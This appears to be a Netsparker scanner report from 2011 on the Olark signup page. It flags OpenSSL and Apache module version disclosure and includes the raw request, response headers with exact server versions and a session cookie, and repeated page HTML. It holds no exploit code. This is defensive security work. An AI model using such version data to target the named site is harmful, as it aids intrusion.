<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html> <head> <script type='text/javascript'> //<![CDATA[ // KISSmetrics code var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/3225b0c50e306468d63651238f71383a01850728.1.js'); //]]> </script> <title> Olark | Signup </title> <meta content='Real-time chat and monitoring of your website visitors through Google Talk and Jabber' name='description' /> <meta content='Olark, chat, livehelp, livesales, free, website, visitors, website monitoring, visitor monitoring, gtalk' name='keywords' /> <link href='/stylesheets/compiled/screen.css' media='screen, projection' rel='stylesheet' type='text/css' /> <link href='/stylesheets/compiled/print.css' media='print' rel='stylesheet' type='text/css' /> <!--[if IE]><link rel="stylesheet" href="/stylesheets/compiled/ie.css" type="text/css" media="screen, projection"><![endif]--> <link href='/images/sky/common/favicon.ico' rel='shortcut icon' type='image/x-icon' /> <script type='text/javascript'> //<![CDATA[ var gaJsHost = (("https:" == document.location.protocol) ? "https://" : "http://"); document.write(unescape("%3Cscript src='" + gaJsHost + "ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js' type='text/javascript'%3E%3C/script%3E")); //]]> </script> <!--[if IE 6]><script type='text/javascript' src="/javascripts/pngfix/DD_belatedPNG.js"></script><![endif]--> <!--[if IE 6]> <script type='text/javascript'> $(document).ready(function(){ DD_belatedPNG.fix('#control_navigation_primary li, .page, .background_container, .one, .two, #thisone, a, img, h1, .button, #top, #bottom'); }); </script> <![endif]--> <script type='text/javascript'> //<![CDATA[ (function(){ window.load_async = function(src, callback){ var a = document.createElement("script"); a.type = "text/javascript"; if(a.readyState){//IE a.onreadystatechange = function(){ if (a.readyState == "loaded" || a.readyState == "complete"){ a.onreadystatechange = null; callback(); } }; }else{//Others a.onload = function(){ callback(); }; } $(document).ready(function(){ a.src = (document.location.protocol == 'https:' ? "https:" : "http:") + "//" + src; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(a,s); }); } })(); //]]> </script> <!-- Google Website Optimizer Control Script --> <script> function utmx_section(){}function utmx(){} (function(){var k='3820629337',d=document,l=d.location,c=d.cookie;function f(n){ if(c){var i=c.indexOf(n+'=');if(i>-1){var j=c.indexOf(';',i);return c.substring(i+n. length+1,j<0?c.length:j)}}}var x=f('__utmx'),xx=f('__utmxx'),h=l.hash; d.write('<sc'+'ript src="'+ 'http'+(l.protocol=='https:'?'s://ssl':'://www')+'.google-analytics.com' +'/siteopt.js?v=1&utmxkey='+k+'&utmx='+(x?x:'')+'&utmxx='+(xx?xx:'')+'&utmxtime=' +new Date().valueOf()+(h?'&utmxhash='+escape(h.substr(1)):'')+ '" type="text/javascript" charset="utf-8"></sc'+'ript>')})(); </script> <!-- End of Google Website Optimizer Control Script --> </head> <body> <div class=' main_background' id='signup'> <div id='fullscreen'> <div class='container'> <a href='/' id='floatinglogo' target='_blank'></a> <div id='top'></div> <div class='page'> <script type='text/javascript'> //<![CDATA[ _kmq.push(['record', 'Viewed Signup Page']); //]]> </script> <div id='login_state'> <h2> Get Excited! </h2> <hr /> <h3> You're about to sign up for the <span class='plan-title'> Free </span> plan! <p> <i> <small> or choose one of our <a href='/signup/plans'> professional plans </a> </small> </i> </p> </h3> <div class='span-16'> <form action="/signup/create_new_account" id="create_new_account" method="post"> <ul class='label-top'> <li class='text required'> <label> Enter your email address <span>*</span> </label> <input type="text" value="" name="user[username]"> </li> <li class='text required'> <label> Pick a username <span>*</span> </label> <input type="text" value="" name="user[email]"> </li> <li class='text required'> <div class='clear'></div> <div class='half-left'> <label> Pick a password <span>*</span> </label> <input id="user_password" name="user[password]" size="30" type="password" /> </div> <div class='half-right'> <label> Re-enter your password <span>*</span> </label> <input id="user_password_confirmation" name="user[password_confirmation]" size="30" type="password" /> </div> <div class='clear'></div> </li> <li class='required'> <i> By clicking 'Continue' I agree to Olark’s <a href='/pages/tos' target='blank'>terms of service</a> <b> <span> * </span> </b> </i> </li> <li class='buttons'> <input class="button green_border" name="commit" type="submit" value="Continue" /> <a class='button blank_border orange' href='/signup/plans'> Choose another plan </a> <div class='clear'></div> </li> <p></p> </ul> </form> </div> <div class='span-6 last'> <div class="testimonial">Olark is the most powerful thing on the planet I've found to increase conversions<div class="testimonial-attribution">Dane Maxwell<br>paperlesspipeline.com</div></div><div class="testimonial">I am happy I switched shopify.com to Olark. SO much cleaner to integrate with you guys :)<div class="testimonial-attribution">Daniel Weinand<br>shopify.com</div></div> </div> </div> <!-- Google Website Optimizer Tracking Script --> <script type="text/javascript"> if(typeof(_gat)!='object')document.write('<sc'+'ript src="http'+ (document.location.protocol=='https:'?'s://ssl':'://www')+ '.google-analytics.com/ga.js"></sc'+'ript>')</script> <script type="text/javascript"> try { var gwoTracker=_gat._getTracker("UA-7433195-1"); gwoTracker._trackPageview("/3820629337/test"); }catch(err){}</script> <!-- End of Google Website Optimizer Tracking Script --> </div> <div id='bottom'></div> </div> </div> </div> <script>var hbl_to_set_username="";</script> <!-- begin olark code --> <script type='text/javascript'> window.olark||(function(c){var f=window,d=document,l=f.location.protocol=="https:"?"https:":"http:",z=c.name,r="load";(function(){f[z]=function(){ (a.s=a.s||[]).push(arguments)};var a=f[z]._={},q=c.methods.length;while(q--){(function(n){f[z][n]=function(){f[z]("call",n,arguments)}})(c.methods[q] )}a.v=0;a.l=c.loader;a.i=arguments.callee;a.f=setTimeout(function(){if(a.f){(new Image).src=l+"//"+a.l.replace(".js",".png")+"&"+escape(f.location.href) }a.f=null},20000);a.p={0:+new Date};a.P=function(u){a.p[u]=new Date-a.p[0]};function s(){a.P(r);f[z](r)}f.addEventListener?f.addEventListener(r,s,false ):f.attachEvent("on"+r,s);(function(){function p(){return["<head></head><",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h, "('script')).",k,"='",l,"//",a.l,"'\"></",i,">"].join("")}var i="body",m=d[i];if(!m){return setTimeout(arguments.callee,100)}a.P(1);var j="appendChild", h="createElement",k="src",n=d[h]("div"),v=n[j](d[h](z)),b=d[h]("iframe"),g="document",e="domain",o;n.style.display="none";m.insertBefore(n,m.firstChild ).id=z;b.frameBorder="0";b.id=z+"-loader";if(/MSIE\s+6/.test(navigator.userAgent)){b.src="javascript:false"}b.allowTransparency="true";v[j](b);try{ b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g]; t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.P(2)})()})()})({loader:(function(m){ return"static.olark.com/jsclient/loader0.js?ts="+(m?m[1]:(+new Date))})(document.cookie.match(/olarkld=(\d+)/)), name:"olark",methods:["configure","extend","declare","identify"]}); olark.identify('9353-431-10-4341');</script> <!-- end olark code --> <script type='text/javascript'> //<![CDATA[ olark.extend(function(api){ api.chat.updateVisitorNickname({snippet: window.hbl_to_set_username}); }); //]]> </script> <script src="/assets/common.js?1307133378" type="text/javascript"></script> <script type='text/javascript'> //<![CDATA[ (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(ga); })(); try { window.mpmetrics = new MixpanelLib("0908d20dfe9d3ea7c81e64bb4ffd7d36"); } catch(err) {} //]]> </script> <script type="text/javascript"> adroll_adv_id = "HYX6JMFHEBBHJEIEFT5BJD"; adroll_pix_id = "BP2WER5KN5CGFOUBWKGVKX"; (function () { var oldonload = window.onload; window.onload = function(){ __adroll_loaded=true; var scr = document.createElement("script"); var host = (("https:" == document.location.protocol) ? "https://s.adroll.com" : "http://a.adroll.com"); scr.setAttribute('async', 'true'); scr.type = "text/javascript"; scr.src = host + "/j/roundtrip.js"; document.documentElement.firstChild.appendChild(scr); if(oldonload){oldonload()}}; }()); </script> <script> $(document).ready(function(){ window.createQtip = function(kwargs) { var url = kwargs.url; var tooltip_text = kwargs.text; var dom_item = kwargs.object; var caller_controller = 'signup'; var caller_action = 'create_new_account'; var caller_id = ''; if(!url.match(/\?/)){ url += "?"; } url += "&caller_action=" + caller_action; url += "&caller_controller=" + caller_controller; // Add the caller_id if it is defined if(caller_id){ url += "&caller_id=" + caller_id; } $(dom_item).bind('click', function(event){ event.preventDefault(); return false; }).qtip({ content: { // Set the text to an image HTML string with the correct src URL to the loading image you want to use text: 'loading...', url: url, // Use the rel attribute of each element for the url to load title: { text: tooltip_text, // Give the tooltip a title using each elements text button: 'Close' // Show a close link in the title } }, position: { target: $(document.body), // Position it via the document body... corner: 'center' // ...at the center of the viewport }, show: { when: 'click', solo: true, // Only show one tooltip at a time effect: { type: 'fade' } }, hide: 'unfocus', style: { width: { max: 800, min: 750 }, padding: '14px', border: { width: 9, radius: 9, color: '#666666' }, name: 'light' } }); }; //Modal dialog boxes for mini-tutorials $('#todo a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.disable-transcripts a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: "Upgrade for Transcripts"}); }); $('.operator_list a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('#group_operator_list a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.search_for_tooltips a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.shopify_intro_video a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.video a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); if($.query.get("show_dialog") ) { // create a new dom object and then show the dialog based on this new item // TODO: have a way to hide tooltips var tmp_tooltip = document.createElement("a"); createQtip({ object:tmp_tooltip, // TODO, append the old controller and action in here url: $.query.get("show_dialog"), text: '' }); $(tmp_tooltip).click(); } // TODO: Move all this javascript somewhere else. //Code for checking whether site.begin_called_at returns true and corresponding UI feedback //generate 2 tooltips initially var failure = document.createElement("a"); var success = document.createElement("a"); createQtip({object: failure, url: "/site/begin_called_at_false", text: "&nbsp;"}); cr..
OpenSSL Version Disclosure

OpenSSL Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is disclosing OpenSSL version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks.

Impact

An attacker can look for specific security vulnerabilities for the identified version. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /signup/create_new_account

/signup/create_new_account

http://www.olark.com/signup/create_new_account

Extracted Version

OpenSSL/0.9.8o

Request

GET /signup/create_new_account HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.olark.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:43:55 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "4984d3b5a9aacb476ca35e832b7ee054"
X-Runtime: 336
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 6153
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid=67ab26df20148a6feeed7cd62a9498b4; path=/; expires=Mon, 04-Jun-2012 21:43:56 GMT,rack_session=BAh7CzoecXVlcnlfc3RyaW5nX2Zvcl9zcHJlZWRseSIAOg5pcGFkZHJlc3Mi%0AFDE3My4xOTMuMjE0LjI0MzoYbWl4cGFuZWxfcHJvcGVydGllc3sIOhZmdWxs%0Ac2NyZWVuX2xheW91dFQ6CXRlc3QiGHRlc3QxOiBsZXNzIGRldGFpbHM6EXRl%0Ac3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVwX3VybCIraHR0cDovL3d3dy5vbGFy%0Aay5jb20vc2lnbnVwL2FmdGVycGxhbnM6FXNwcmVlZGx5X3BsYW5faWQwOhFo%0AdHRwX3JlZmVyZXIw%0A; path=/,_habla_session_id=c091b2fc37c7c2465e4eba91966d2498; path=/
Via: 1.1 web2.local
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html> <head> <script type='text/javascript'> //<![CDATA[ // KISSmetrics code var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/3225b0c50e306468d63651238f71383a01850728.1.js'); //]]> </script> <title> Olark | Signup </title> <meta content='Real-time chat and monitoring of your website visitors through Google Talk and Jabber' name='description' /> <meta content='Olark, chat, livehelp, livesales, free, website, visitors, website monitoring, visitor monitoring, gtalk' name='keywords' /> <link href='/stylesheets/compiled/screen.css' media='screen, projection' rel='stylesheet' type='text/css' /> <link href='/stylesheets/compiled/print.css' media='print' rel='stylesheet' type='text/css' /> <!--[if IE]><link rel="stylesheet" href="/stylesheets/compiled/ie.css" type="text/css" media="screen, projection"><![endif]--> <link href='/images/sky/common/favicon.ico' rel='shortcut icon' type='image/x-icon' /> <script type='text/javascript'> //<![CDATA[ var gaJsHost = (("https:" == document.location.protocol) ? "https://" : "http://"); document.write(unescape("%3Cscript src='" + gaJsHost + "ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js' type='text/javascript'%3E%3C/script%3E")); //]]> </script> <!--[if IE 6]><script type='text/javascript' src="/javascripts/pngfix/DD_belatedPNG.js"></script><![endif]--> <!--[if IE 6]> <script type='text/javascript'> $(document).ready(function(){ DD_belatedPNG.fix('#control_navigation_primary li, .page, .background_container, .one, .two, #thisone, a, img, h1, .button, #top, #bottom'); }); </script> <![endif]--> <script type='text/javascript'> //<![CDATA[ (function(){ window.load_async = function(src, callback){ var a = document.createElement("script"); a.type = "text/javascript"; if(a.readyState){//IE a.onreadystatechange = function(){ if (a.readyState == "loaded" || a.readyState == "complete"){ a.onreadystatechange = null; callback(); } }; }else{//Others a.onload = function(){ callback(); }; } $(document).ready(function(){ a.src = (document.location.protocol == 'https:' ? "https:" : "http:") + "//" + src; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(a,s); }); } })(); //]]> </script> <!-- Google Website Optimizer Control Script --> <script> function utmx_section(){}function utmx(){} (function(){var k='3820629337',d=document,l=d.location,c=d.cookie;function f(n){ if(c){var i=c.indexOf(n+'=');if(i>-1){var j=c.indexOf(';',i);return c.substring(i+n. length+1,j<0?c.length:j)}}}var x=f('__utmx'),xx=f('__utmxx'),h=l.hash; d.write('<sc'+'ript src="'+ 'http'+(l.protocol=='https:'?'s://ssl':'://www')+'.google-analytics.com' +'/siteopt.js?v=1&utmxkey='+k+'&utmx='+(x?x:'')+'&utmxx='+(xx?xx:'')+'&utmxtime=' +new Date().valueOf()+(h?'&utmxhash='+escape(h.substr(1)):'')+ '" type="text/javascript" charset="utf-8"></sc'+'ript>')})(); </script> <!-- End of Google Website Optimizer Control Script --> </head> <body> <div class=' main_background' id='signup'> <div id='fullscreen'> <div class='container'> <a href='/' id='floatinglogo' target='_blank'></a> <div id='top'></div> <div class='page'> <script type='text/javascript'> //<![CDATA[ _kmq.push(['record', 'Viewed Signup Page']); //]]> </script> <div id='login_state'> <h2> Get Excited! </h2> <hr /> <h3> You're about to sign up for the <span class='plan-title'> Free </span> plan! <p> <i> <small> or choose one of our <a href='/signup/plans'> professional plans </a> </small> </i> </p> </h3> <div class='span-16'> <form action="/signup/create_new_account" id="create_new_account" method="post"> <ul class='label-top'> <li class='text required'> <label> Enter your email address <span>*</span> </label> <input type="text" value="" name="user[username]"> </li> <li class='text required'> <label> Pick a username <span>*</span> </label> <input type="text" value="" name="user[email]"> </li> <li class='text required'> <div class='clear'></div> <div class='half-left'> <label> Pick a password <span>*</span> </label> <input id="user_password" name="user[password]" size="30" type="password" /> </div> <div class='half-right'> <label> Re-enter your password <span>*</span> </label> <input id="user_password_confirmation" name="user[password_confirmation]" size="30" type="password" /> </div> <div class='clear'></div> </li> <li class='required'> <i> By clicking 'Continue' I agree to Olark’s <a href='/pages/tos' target='blank'>terms of service</a> <b> <span> * </span> </b> </i> </li> <li class='buttons'> <input class="button green_border" name="commit" type="submit" value="Continue" /> <a class='button blank_border orange' href='/signup/plans'> Choose another plan </a> <div class='clear'></div> </li> <p></p> </ul> </form> </div> <div class='span-6 last'> <div class="testimonial">Olark is the most powerful thing on the planet I've found to increase conversions<div class="testimonial-attribution">Dane Maxwell<br>paperlesspipeline.com</div></div><div class="testimonial">I am happy I switched shopify.com to Olark. SO much cleaner to integrate with you guys :)<div class="testimonial-attribution">Daniel Weinand<br>shopify.com</div></div> </div> </div> <!-- Google Website Optimizer Tracking Script --> <script type="text/javascript"> if(typeof(_gat)!='object')document.write('<sc'+'ript src="http'+ (document.location.protocol=='https:'?'s://ssl':'://www')+ '.google-analytics.com/ga.js"></sc'+'ript>')</script> <script type="text/javascript"> try { var gwoTracker=_gat._getTracker("UA-7433195-1"); gwoTracker._trackPageview("/3820629337/test"); }catch(err){}</script> <!-- End of Google Website Optimizer Tracking Script --> </div> <div id='bottom'></div> </div> </div> </div> <script>var hbl_to_set_username="";</script> <!-- begin olark code --> <script type='text/javascript'> window.olark||(function(c){var f=window,d=document,l=f.location.protocol=="https:"?"https:":"http:",z=c.name,r="load";(function(){f[z]=function(){ (a.s=a.s||[]).push(arguments)};var a=f[z]._={},q=c.methods.length;while(q--){(function(n){f[z][n]=function(){f[z]("call",n,arguments)}})(c.methods[q] )}a.v=0;a.l=c.loader;a.i=arguments.callee;a.f=setTimeout(function(){if(a.f){(new Image).src=l+"//"+a.l.replace(".js",".png")+"&"+escape(f.location.href) }a.f=null},20000);a.p={0:+new Date};a.P=function(u){a.p[u]=new Date-a.p[0]};function s(){a.P(r);f[z](r)}f.addEventListener?f.addEventListener(r,s,false ):f.attachEvent("on"+r,s);(function(){function p(){return["<head></head><",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h, "('script')).",k,"='",l,"//",a.l,"'\"></",i,">"].join("")}var i="body",m=d[i];if(!m){return setTimeout(arguments.callee,100)}a.P(1);var j="appendChild", h="createElement",k="src",n=d[h]("div"),v=n[j](d[h](z)),b=d[h]("iframe"),g="document",e="domain",o;n.style.display="none";m.insertBefore(n,m.firstChild ).id=z;b.frameBorder="0";b.id=z+"-loader";if(/MSIE\s+6/.test(navigator.userAgent)){b.src="javascript:false"}b.allowTransparency="true";v[j](b);try{ b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g]; t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.P(2)})()})()})({loader:(function(m){ return"static.olark.com/jsclient/loader0.js?ts="+(m?m[1]:(+new Date))})(document.cookie.match(/olarkld=(\d+)/)), name:"olark",methods:["configure","extend","declare","identify"]}); olark.identify('9353-431-10-4341');</script> <!-- end olark code --> <script type='text/javascript'> //<![CDATA[ olark.extend(function(api){ api.chat.updateVisitorNickname({snippet: window.hbl_to_set_username}); }); //]]> </script> <script src="/assets/common.js?1307133378" type="text/javascript"></script> <script type='text/javascript'> //<![CDATA[ (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(ga); })(); try { window.mpmetrics = new MixpanelLib("0908d20dfe9d3ea7c81e64bb4ffd7d36"); } catch(err) {} //]]> </script> <script type="text/javascript"> adroll_adv_id = "HYX6JMFHEBBHJEIEFT5BJD"; adroll_pix_id = "BP2WER5KN5CGFOUBWKGVKX"; (function () { var oldonload = window.onload; window.onload = function(){ __adroll_loaded=true; var scr = document.createElement("script"); var host = (("https:" == document.location.protocol) ? "https://s.adroll.com" : "http://a.adroll.com"); scr.setAttribute('async', 'true'); scr.type = "text/javascript"; scr.src = host + "/j/roundtrip.js"; document.documentElement.firstChild.appendChild(scr); if(oldonload){oldonload()}}; }()); </script> <script> $(document).ready(function(){ window.createQtip = function(kwargs) { var url = kwargs.url; var tooltip_text = kwargs.text; var dom_item = kwargs.object; var caller_controller = 'signup'; var caller_action = 'create_new_account'; var caller_id = ''; if(!url.match(/\?/)){ url += "?"; } url += "&caller_action=" + caller_action; url += "&caller_controller=" + caller_controller; // Add the caller_id if it is defined if(caller_id){ url += "&caller_id=" + caller_id; } $(dom_item).bind('click', function(event){ event.preventDefault(); return false; }).qtip({ content: { // Set the text to an image HTML string with the correct src URL to the loading image you want to use text: 'loading...', url: url, // Use the rel attribute of each element for the url to load title: { text: tooltip_text, // Give the tooltip a title using each elements text button: 'Close' // Show a close link in the title } }, position: { target: $(document.body), // Position it via the document body... corner: 'center' // ...at the center of the viewport }, show: { when: 'click', solo: true, // Only show one tooltip at a time effect: { type: 'fade' } }, hide: 'unfocus', style: { width: { max: 800, min: 750 }, padding: '14px', border: { width: 9, radius: 9, color: '#666666' }, name: 'light' } }); }; //Modal dialog boxes for mini-tutorials $('#todo a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.disable-transcripts a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: "Upgrade for Transcripts"}); }); $('.operator_list a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('#group_operator_list a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.search_for_tooltips a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.shopify_intro_video a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); $('.video a[rel]').each(function() { createQtip({object:this, url:$(this).attr('rel'), text: $(this).text()}); }); if($.query.get("show_dialog") ) { // create a new dom object and then show the dialog based on this new item // TODO: have a way to hide tooltips var tmp_tooltip = document.createElement("a"); createQtip({ object:tmp_tooltip, // TODO, append the old controller and action in here url: $.query.get("show_dialog"), text: '' }); $(tmp_tooltip).click(); } // TODO: Move all this javascript somewhere else. //Code for checking whether site.begin_called_at returns true and corresponding UI feedback //generate 2 tooltips initially var failure = document.createElement("a"); var success = document.createElement("a"); createQtip({object: failure, url: "/site/begin_called_at_false", text: "&nbsp;"}); cr..
Apache Module Version Disclosure

Apache Module Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is disclosing one of the Apache modules version. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can look for specific security vulnerabilities for the identified Apache module version. The attacker can also use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /signup/create_new_account

/signup/create_new_account

http://www.olark.com/signup/create_new_account

Extracted Version

mod_ssl/2.2.11 OpenSSL/0.9.8o

Request

GET /signup/create_new_account HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.olark.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:43:55 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "4984d3b5a9aacb476ca35e832b7ee054"
X-Runtime: 336
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 6153
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid=67ab26df20148a6feeed7cd62a9498b4; path=/; expires=Mon, 04-Jun-2012 21:43:56 GMT,rack_session=BAh7CzoecXVlcnlfc3RyaW5nX2Zvcl9zcHJlZWRseSIAOg5pcGFkZHJlc3Mi%0AFDE3My4xOTMuMjE0LjI0MzoYbWl4cGFuZWxfcHJvcGVydGllc3sIOhZmdWxs%0Ac2NyZWVuX2xheW91dFQ6CXRlc3QiGHRlc3QxOiBsZXNzIGRldGFpbHM6EXRl%0Ac3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVwX3VybCIraHR0cDovL3d3dy5vbGFy%0Aay5jb20vc2lnbnVwL2FmdGVycGxhbnM6FXNwcmVlZGx5X3BsYW5faWQwOhFo%0AdHRwX3JlZmVyZXIw%0A; path=/,_habla_session_id=c091b2fc37c7c2465e4eba91966d2498; path=/
Via: 1.1 web2.local
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html> <head> <script type='text/javascript'> //<![CDATA[ // KISSmetrics code var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/3225b0c50e306468d63651238f71383a01850728.1.js'); //]]> </script> <title> Olark | Signup </title> <meta content='Real-time chat and monitoring of your website visitors through Google Talk and Jabber' name='description' /> <meta content='Olark, chat, livehelp, livesales, free, website, visitors, website monitoring, visitor monitoring, gtalk' name='keywords' /> <link href='/stylesheets/compiled/screen.css' media='screen, projection' rel='stylesheet' type='text/css' /> <link href='/stylesheets/compiled/print.css' media='print' rel='stylesheet' type='text/css' /> <!--[if IE]><link rel="stylesheet" href="/stylesheets/compiled/ie.css" type="text/css" media="screen, projection"><![endif]--> <link href='/images/sky/common/favicon.ico' rel='shortcut icon' type='image/x-icon' /> <script type='text/javascript'> //<![CDATA[ var gaJsHost = (("https:" == document.location.protocol) ? "https://" : "http://"); document.write(unescape("%3Cscript src='" + gaJsHost + "ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js' type='text/javascript'%3E%3C/script%3E")); //]]> </script> <!--[if IE 6]><script type='text/javascript' src="/javascripts/pngfix/DD_belatedPNG.js"></script><![endif]--> <!--[if IE 6]> <script type='text/javascript'> $(document).ready(function(){ DD_belatedPNG.fix('#control_navigation_primary li, .page, .background_container, .one, .two, #thisone, a, img, h1, .button, #top, #bottom'); }); </script> <![endif]--> <script type='text/javascript'> //<![CDATA[ (function(){ window.load_async = function(src, callback){ var a = document.createElement("script"); a.type = "text/javascript"; if(a.readyState){//IE a.onreadystatechange = function(){ if (a.readyState == "loaded" || a.readyState == "complete"){ a.onreadystatechange = null; callback(); } }; }else{//Others a.onload = function(){ callback(); }; } $(document).ready(function(){ a.src = (document.location.protocol == 'https:' ? "https:" : "http:") + "//" + src; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(a,s); }); } })(); //]]> </script> <!-- Google Website Optimizer Control Script --> <script> function utmx_section(){}function utmx(){} (function(){var k='3820629337',d=document,l=d.location,c=d.cookie;function f(n){ if(c){var i=c.indexOf(n+'=');if(i>-1){var j=c.indexOf(';',i);return c.substring(i+n. length+1,j<0?c.length:j)}}}var x=f('__utmx'),xx=f('__utmxx'),h=l.hash; d.write('<sc'+'ript src="'+ 'http'+(l.protocol=='https:'?'s://ssl':'://www')+'.google-analytics.com' +'/siteopt.js?v=1&utmxkey='+k+'&utmx='+(x?x:'')+'&utmxx='+(xx?xx:'')+'&utmxtime=' +new Date().valueOf()+(h?'&utmxhash='+escape(h.substr(1)):'')+ '" type="text/javascript" charset="utf-8"></sc'+'ript>')})(); </script> <!-- End of Google Website Optimizer Control Script --> </head> <body> <div class=' main_background' id='signup'> <div id='fullscreen'> <div class='container'> <a href='/' id='floatinglogo' target='_blank'></a> <div id='top'></div> <div class='page'> <script type='text/javascript'> //<![CDATA[ _kmq.push(['record', 'Viewed Signup Page']); //]]> </script> <div id='login_state'> <h2> Get Excited! </h2> <hr /> <h3> You're about to sign up for the <span class='plan-title'> Free </span> plan! <p> <i> <small> or choose one of our <a href='/signup/plans'> professional plans </a> </small> </i> </p> </h3> <div class='span-16'> <form action="/signup/create_new_account" id="create_new_account" method="post"> <ul class='label-top'> <li class='text required'> <label> Enter your email address <span>*</span> </label> <input type="text" value="" name="user[username]"> </li> <li class='text required'> <label> Pick a username <span>*</span> </label> <input type="text" value="" name="user[email]"> </li> <li class='text required'> <div class='clear'></div> <div class='half-left'> <label> Pick a password <span>*</span> </label> <input id="user_password" name="user[password]" size="30" type="password" /> </div> <div class='half-right'> <label> Re-enter your password 